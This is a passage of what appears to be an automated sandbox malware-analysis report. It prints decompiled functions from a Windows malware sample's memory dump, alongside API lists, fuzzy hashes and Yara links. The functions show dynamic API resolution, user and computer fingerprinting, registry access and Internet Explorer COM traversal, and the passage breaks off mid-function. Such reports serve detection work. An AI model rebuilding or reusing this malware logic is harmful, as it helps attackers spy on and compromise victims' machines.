                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: 93ef73b25ab3d5c711f7cc68267d37b0ff8f9ea3bd68cfa4f32174cfb3f150fe
                                                                                                                          • Instruction ID: 5d18ebce04dd464e53cbc39a835294f47ee1af863b8039adb36e2df6c2a15a74
                                                                                                                          • Opcode Fuzzy Hash: 93ef73b25ab3d5c711f7cc68267d37b0ff8f9ea3bd68cfa4f32174cfb3f150fe
                                                                                                                          • Instruction Fuzzy Hash: 25415D36900609AFDB01DFB8D845AAEB7B9EF89311F144476E910EB210EB71ED05CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974837, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E049775F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x497d2e0; // 0x267a5a8
					_t1 = _t23 + 0x497e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x497d2e0; // 0x267a5a8
					_t2 = _t26 + 0x497e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04974AAB(_t54);
					} else {
						_t30 =  *0x497d2e0; // 0x267a5a8
						_t5 = _t30 + 0x497e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x497d2e0; // 0x267a5a8
							_t7 = _t33 + 0x497e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x497d2e0; // 0x267a5a8
								_t9 = _t36 + 0x497e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x497d2e0; // 0x267a5a8
									_t11 = _t39 + 0x497e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04979269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                          0x04974846
                                                                                                                          0x0497484a
                                                                                                                          0x0497490c
                                                                                                                          0x04974850
                                                                                                                          0x04974850
                                                                                                                          0x04974855
                                                                                                                          0x04974868
                                                                                                                          0x0497486a
                                                                                                                          0x0497486f
                                                                                                                          0x04974877
                                                                                                                          0x0497487e
                                                                                                                          0x04974880
                                                                                                                          0x04974885
                                                                                                                          0x04974904
                                                                                                                          0x04974905
                                                                                                                          0x04974887
                                                                                                                          0x04974887
                                                                                                                          0x0497488c
                                                                                                                          0x04974894
                                                                                                                          0x04974896
                                                                                                                          0x0497489b
                                                                                                                          0x00000000
                                                                                                                          0x0497489d
                                                                                                                          0x0497489d
                                                                                                                          0x049748a2
                                                                                                                          0x049748aa
                                                                                                                          0x049748ac
                                                                                                                          0x049748b1
                                                                                                                          0x00000000
                                                                                                                          0x049748b3
                                                                                                                          0x049748b3
                                                                                                                          0x049748b8
                                                                                                                          0x049748c0
                                                                                                                          0x049748c2
                                                                                                                          0x049748c7
                                                                                                                          0x00000000
                                                                                                                          0x049748c9
                                                                                                                          0x049748c9
                                                                                                                          0x049748ce
                                                                                                                          0x049748d6
                                                                                                                          0x049748d8
                                                                                                                          0x049748dd
                                                                                                                          0x00000000
                                                                                                                          0x049748df
                                                                                                                          0x049748e5
                                                                                                                          0x049748ea
                                                                                                                          0x049748f1
                                                                                                                          0x049748f6
                                                                                                                          0x049748fb
                                                                                                                          0x00000000
                                                                                                                          0x049748fd
                                                                                                                          0x04974900
                                                                                                                          0x04974900
                                                                                                                          0x049748fb
                                                                                                                          0x049748dd
                                                                                                                          0x049748c7
                                                                                                                          0x049748b1
                                                                                                                          0x0497489b
                                                                                                                          0x04974885
                                                                                                                          0x0497491a

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0497101C,?,00000001,?,?,00000000,00000000), ref: 0497485C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0497487E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04974894
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049748AA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049748C0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049748D6
                                                                                                                            • Part of subcall function 04979269: memset.NTDLL ref: 049792E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1886625739-0
                                                                                                                          • Opcode ID: a7ce4778b34008d42ceaa4e6af25003e0b4166803e2202be4e4a6a7aa47b19d8
                                                                                                                          • Instruction ID: 13b47f9e443097aabdd32ef01ccd1c3c49b625bbbe88c41b88b315543aecf234
                                                                                                                          • Opcode Fuzzy Hash: a7ce4778b34008d42ceaa4e6af25003e0b4166803e2202be4e4a6a7aa47b19d8
                                                                                                                          • Instruction Fuzzy Hash: F5216BB060060BAFEB20DF69D848E6ABBECEF44B44B004476E545D7212E774FE05CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0497282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x497d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04971922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04975C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04974AAB(_a8);
						goto L29;
					}
					_t64 =  *0x497d2b0; // 0x6ff9b38
					_t16 = _t64 + 0xc; // 0x6ff9c06
					_t65 = E04971922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0497c0
						if(E04974A6D(_t97,  *_t33, _t91, _a8,  *0x497d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x497d2e0; // 0x267a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x497ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x497ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E04975F64(_t69,  *0x497d374,  *0x497d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x497d2e0; // 0x267a5a8
									_t44 = _t71 + 0x497e83e; // 0x74666f53
									_t73 = E04971922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0497c0
										E04975DDA( *_t47, _t91, _a8,  *0x497d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d0497c0
										E04975DDA( *_t49, _t91, _t99,  *0x497d370, _a16);
										E04974AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0497c0
									E04975DDA( *_t40, _t91, _a8,  *0x497d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d0497c0
									E04975DDA( *_t43, _t91, _a8,  *0x497d370, _a16);
								}
								if( *_t101 != 0) {
									E04974AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0497c0
					_t81 = E049763F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0497c0
							E04974A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04974AAB(_t100);
						_t98 = _a16;
					}
					E04974AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0497A938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x497d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                          0x0497282b
                                                                                                                          0x04972834
                                                                                                                          0x0497283b
                                                                                                                          0x04972840
                                                                                                                          0x049728ad
                                                                                                                          0x049728b3
                                                                                                                          0x049728b8
                                                                                                                          0x049728bf
                                                                                                                          0x049728c4
                                                                                                                          0x049728c9
                                                                                                                          0x04972a34
                                                                                                                          0x04972a3b
                                                                                                                          0x04972a3b
                                                                                                                          0x04972a40
                                                                                                                          0x04972a42
                                                                                                                          0x04972a42
                                                                                                                          0x04972a4b
                                                                                                                          0x04972a4b
                                                                                                                          0x049728cf
                                                                                                                          0x049728db
                                                                                                                          0x04972a2a
                                                                                                                          0x04972a2d
                                                                                                                          0x00000000
                                                                                                                          0x04972a2d
                                                                                                                          0x049728e1
                                                                                                                          0x049728e6
                                                                                                                          0x049728e9
                                                                                                                          0x049728ee
                                                                                                                          0x049728f3
                                                                                                                          0x0497293c
                                                                                                                          0x0497293c
                                                                                                                          0x0497294f
                                                                                                                          0x04972959
                                                                                                                          0x0497295f
                                                                                                                          0x04972966
                                                                                                                          0x04972970
                                                                                                                          0x04972970
                                                                                                                          0x04972968
                                                                                                                          0x04972968
                                                                                                                          0x04972968
                                                                                                                          0x04972968
                                                                                                                          0x04972992
                                                                                                                          0x0497299a
                                                                                                                          0x049729c8
                                                                                                                          0x049729cd
                                                                                                                          0x049729d4
                                                                                                                          0x049729d9
                                                                                                                          0x049729dd
                                                                                                                          0x04972a0f
                                                                                                                          0x049729df
                                                                                                                          0x049729ec
                                                                                                                          0x049729ef
                                                                                                                          0x049729ff
                                                                                                                          0x04972a02
                                                                                                                          0x04972a08
                                                                                                                          0x04972a08
                                                                                                                          0x0497299c
                                                                                                                          0x049729a9
                                                                                                                          0x049729ac
                                                                                                                          0x049729be
                                                                                                                          0x049729c1
                                                                                                                          0x049729c1
                                                                                                                          0x04972a19
                                                                                                                          0x04972a25
                                                                                                                          0x04972a1b
                                                                                                                          0x04972a1e
                                                                                                                          0x04972a1e
                                                                                                                          0x04972a19
                                                                                                                          0x04972992
                                                                                                                          0x00000000
                                                                                                                          0x04972959
                                                                                                                          0x04972902
                                                                                                                          0x04972905
                                                                                                                          0x0497290c
                                                                                                                          0x04972912
                                                                                                                          0x04972915
                                                                                                                          0x04972917
                                                                                                                          0x04972923
                                                                                                                          0x04972926
                                                                                                                          0x04972926
                                                                                                                          0x0497292c
                                                                                                                          0x04972931
                                                                                                                          0x04972931
                                                                                                                          0x04972937
                                                                                                                          0x00000000
                                                                                                                          0x04972937
                                                                                                                          0x04972845
                                                                                                                          0x00000000
                                                                                                                          0x0497286c
                                                                                                                          0x0497286c
                                                                                                                          0x04972878
                                                                                                                          0x0497288b
                                                                                                                          0x04972891
                                                                                                                          0x04972899
                                                                                                                          0x00000000
                                                                                                                          0x04972899

                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(04972197,0000005F,00000000,00000000,00000104), ref: 0497285E
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 0497288B
                                                                                                                            • Part of subcall function 04971922: lstrlen.KERNEL32(?,00000000,06FF9B38,00000000,049774FF,06FF9D16,?,?,?,?,?,69B25F44,00000005,0497D00C), ref: 04971929
                                                                                                                            • Part of subcall function 04971922: mbstowcs.NTDLL ref: 04971952
                                                                                                                            • Part of subcall function 04971922: memset.NTDLL ref: 04971964
                                                                                                                            • Part of subcall function 04975DDA: lstrlenW.KERNEL32(?,?,?,049729F4,3D0497C0,80000002,04972197,0497258B,74666F53,4D4C4B48,0497258B,?,3D0497C0,80000002,04972197,?), ref: 04975DFF
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 049728AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                          • String ID: ($\
                                                                                                                          • API String ID: 3924217599-1512714803
                                                                                                                          • Opcode ID: 4a4a929556cac061bcdcb68f9642d0f4035df5b2487a83c96e7ebad343ee059d
                                                                                                                          • Instruction ID: cec94201deefe599b4880ffb769aba9049a8b06145169046814e7bb6ce37cff2
                                                                                                                          • Opcode Fuzzy Hash: 4a4a929556cac061bcdcb68f9642d0f4035df5b2487a83c96e7ebad343ee059d
                                                                                                                          • Instruction Fuzzy Hash: 41517D71210609FFEF269F60DD80EAA3BBAFF84314F108574FA1596161E739E925DB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497137A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0497137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E049775F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04974AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4974565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                          0x04971388
                                                                                                                          0x0497138b
                                                                                                                          0x0497138e
                                                                                                                          0x04971394
                                                                                                                          0x04971399
                                                                                                                          0x0497139f
                                                                                                                          0x049713a7
                                                                                                                          0x049713aa
                                                                                                                          0x049713b0
                                                                                                                          0x049713b5
                                                                                                                          0x049713c2
                                                                                                                          0x049713cf
                                                                                                                          0x049713d3
                                                                                                                          0x049713d5
                                                                                                                          0x049713d9
                                                                                                                          0x049713dc
                                                                                                                          0x049713ec
                                                                                                                          0x0497143f
                                                                                                                          0x04971440
                                                                                                                          0x049713ee
                                                                                                                          0x049713f3
                                                                                                                          0x049713f4
                                                                                                                          0x049713f9
                                                                                                                          0x049713fc
                                                                                                                          0x0497140f
                                                                                                                          0x00000000
                                                                                                                          0x04971411
                                                                                                                          0x04971414
                                                                                                                          0x04971419
                                                                                                                          0x04971427
                                                                                                                          0x0497142a
                                                                                                                          0x04971430
                                                                                                                          0x04971435
                                                                                                                          0x00000000
                                                                                                                          0x04971437
                                                                                                                          0x04971437
                                                                                                                          0x0497143a
                                                                                                                          0x0497143a
                                                                                                                          0x04971435
                                                                                                                          0x0497140f
                                                                                                                          0x04971445
                                                                                                                          0x04971446
                                                                                                                          0x049713b5
                                                                                                                          0x0497144c

                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04974563), ref: 0497138E
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,04974563), ref: 049713AA
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04974563), ref: 049713E4
                                                                                                                          • GetComputerNameW.KERNEL32(04974563,?), ref: 04971407
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04974563,00000000,04974565,00000000,00000000,?,?,04974563), ref: 0497142A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850880919-0
                                                                                                                          • Opcode ID: 708d60c791e27f6c5142a9b3bdef87d2a3565ff70eb4f6aa9fdae02036aeff8b
                                                                                                                          • Instruction ID: 9aed837f6efa79c1bc7a62c8546122299d406a9e20a309f57b7a3ff69a172afd
                                                                                                                          • Opcode Fuzzy Hash: 708d60c791e27f6c5142a9b3bdef87d2a3565ff70eb4f6aa9fdae02036aeff8b
                                                                                                                          • Instruction Fuzzy Hash: 7621B5B6900208FFDB11DFE9D985DEEBBBDEF44304B5044AAE501E7200EA34AB45DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04971A24, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04971A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x497d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x497d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x497d290 = _t6;
					 *0x497d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x497d28c = _t7;
					if(_t7 == 0) {
						 *0x497d28c =  *0x497d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                          0x04971a2c
                                                                                                                          0x04971a32
                                                                                                                          0x04971a39
                                                                                                                          0x00000000
                                                                                                                          0x04971a93
                                                                                                                          0x04971a3b
                                                                                                                          0x04971a43
                                                                                                                          0x04971a50
                                                                                                                          0x04971a50
                                                                                                                          0x04971a90
                                                                                                                          0x00000000
                                                                                                                          0x04971a90
                                                                                                                          0x04971a52
                                                                                                                          0x04971a52
                                                                                                                          0x04971a57
                                                                                                                          0x04971a69
                                                                                                                          0x04971a6e
                                                                                                                          0x04971a74
                                                                                                                          0x04971a7a
                                                                                                                          0x04971a81
                                                                                                                          0x04971a83
                                                                                                                          0x04971a83
                                                                                                                          0x00000000
                                                                                                                          0x04971a8a
                                                                                                                          0x04971a4c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04971a4e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04972669,?,?,00000001,?,?,?,04971900,?), ref: 04971A2C
                                                                                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A3B
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A57
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04971900,?), ref: 04971A74
                                                                                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A93
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2270775618-0
                                                                                                                          • Opcode ID: ac7719e9559e4591cb0061a6181c97e1c2e5a9420ca583b2582f9f08cc35a5e7
                                                                                                                          • Instruction ID: 61ec083c69f7981f830c763a909cf136cd8c0989353fa873f924d44234b5ec2e
                                                                                                                          • Opcode Fuzzy Hash: ac7719e9559e4591cb0061a6181c97e1c2e5a9420ca583b2582f9f08cc35a5e7
                                                                                                                          • Instruction Fuzzy Hash: 5CF04474648302EBEB248F24AC1BB253F69EB44751F00473AE606DA2D0E778E842DF59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04973273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 049732AE
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973393
                                                                                                                            • Part of subcall function 04975920: SysAllocString.OLEAUT32(0497C2B0), ref: 04975970
                                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 049733E6
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 049733F5
                                                                                                                            • Part of subcall function 04973D39: Sleep.KERNEL32(000001F4), ref: 04973D81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3193056040-0
                                                                                                                          • Opcode ID: f7e98c0f1882a3787e5e89a4d26cbb8f4272d0aced3cd8fcd0935d08dc48d2dd
                                                                                                                          • Instruction ID: adbe444ff76f70dc3f113e1ed773953b0d558fe2c9ace77772c9161c375c2b88
                                                                                                                          • Opcode Fuzzy Hash: f7e98c0f1882a3787e5e89a4d26cbb8f4272d0aced3cd8fcd0935d08dc48d2dd
                                                                                                                          • Instruction Fuzzy Hash: F9513E76600609EFDB21DFA8C844A9EB7BAFFC8704B148879E905DB210DB75ED06DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04975920, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E04975920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x497d2e0; // 0x267a5a8
					_t5 = _t103 + 0x497e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x497c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x497d2e0; // 0x267a5a8
												_t28 = _t109 + 0x497e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x497d2e0; // 0x267a5a8
														_t33 = _t79 + 0x497e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
